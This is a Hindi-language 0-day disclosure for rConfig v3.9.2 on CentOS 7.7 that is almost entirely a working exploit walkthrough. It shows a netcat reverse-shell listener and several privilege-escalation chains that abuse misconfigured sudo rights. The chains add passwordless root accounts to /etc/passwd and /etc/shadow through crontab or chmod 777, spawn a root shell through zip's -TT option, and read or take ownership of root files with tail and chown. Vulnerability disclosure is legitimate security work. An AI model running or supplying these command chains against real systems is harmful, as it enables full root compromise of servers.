
नई खोजी गई 0-days!
[विवरण]
rConfig v3.9.2 में गलत कॉन्फ़िगरेशन के कारण कई हमले वेक्टर हैं, जो स्थानीय उपयोगकर्ताओं को sudo के माध्यम से रूट कमांड निष्पादित करने की अनुमति देते हैं।
[खोजकर्ता]
dmw0ng - Discord: dmw0ng#4449
TheCyberGeek - Discord: TheCyberGeek#1892
ईमेल: [email protected]
rConfig 3.9.2 में Sudo कॉन्फ़िगरेशन apache उपयोगकर्ता को /usr/bin/zip, /bin/chmod, और /usr/bin/tail प्रोग्राम को रूट के रूप में निष्पादित करने की अनुमति देता है। इसका उपयोग CVE-2019-16662 और CVE-2019-16663 के साथ मिलकर रिमोट कोड निष्पादन के लिए किया जा सकता है।
यह उपयोगकर्ता द्वारा अनुचित कॉन्फ़िगरेशन के कारण सिस्टम समझौता करने वाली कमजोरियों का एक सेट है।
[कमजोरी का प्रकार]
असुरक्षित अनुमतियाँ (Insecure Permissions)
OS: CentOS 7.7.1908 सॉफ्टवेयर: rConfig v3.9.2
rConfig v3.9.2 में गलत कॉन्फ़िगरेशन के कारण कई हमले वेक्टर हैं, जो स्थानीय उपयोगकर्ताओं को sudo के माध्यम से रूट कमांड निष्पादित करने की अनुमति देते हैं।
Askar के एक्सप्लॉइट का उपयोग करते हुए:
https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ हम rConfig 3.9.2 पर apache उपयोगकर्ता प्राप्त करते हैं।
root@TheCyberGeek:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.230.22: inverse host lookup failed: Unknown host
connect to [10.10.11.3] from (UNKNOWN) [192.168.230.22] 60598
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache)
उपयोगकर्ता apache गलत कॉन्फ़िगरेशन पर निम्नलिखित कमांड चला सकता है:
(ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm
id
uid=48 gid=48(apache) groups=48(apache)
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l
* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow
* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned
id
uid=0(root) gid=0(root) groups=0(root)

id
uid=48 gid=48(apache) groups=48(apache)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 65%)
sudo rm $TF
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /bin/chmod 777 /etc/shadow
sudo /bin/chmod 777 /etc/passwd
echo "pwned:::0:99999:7:::" >> /etc/shadow
echo "pwned:x:0:0:root:/root:/bin/bash" >> /etc/passwd
su pwned
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)


id
uid=48(apache) gid=48(apache) groups=48(apache)
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
LFILE=/root/secret.txt
sudo tail -c1G "$LFILE"
I got the secret


ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
sudo /bin/chown apache:apache /root/secret.txt
ls -la /root/secret.txt
-rwx------ 1 apache apache 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
I got the secret



इस प्रकार हम rConfig स्थापित किसी भी CentOS 7.7.1908 को पूरी तरह से समझौता कर लेते हैं।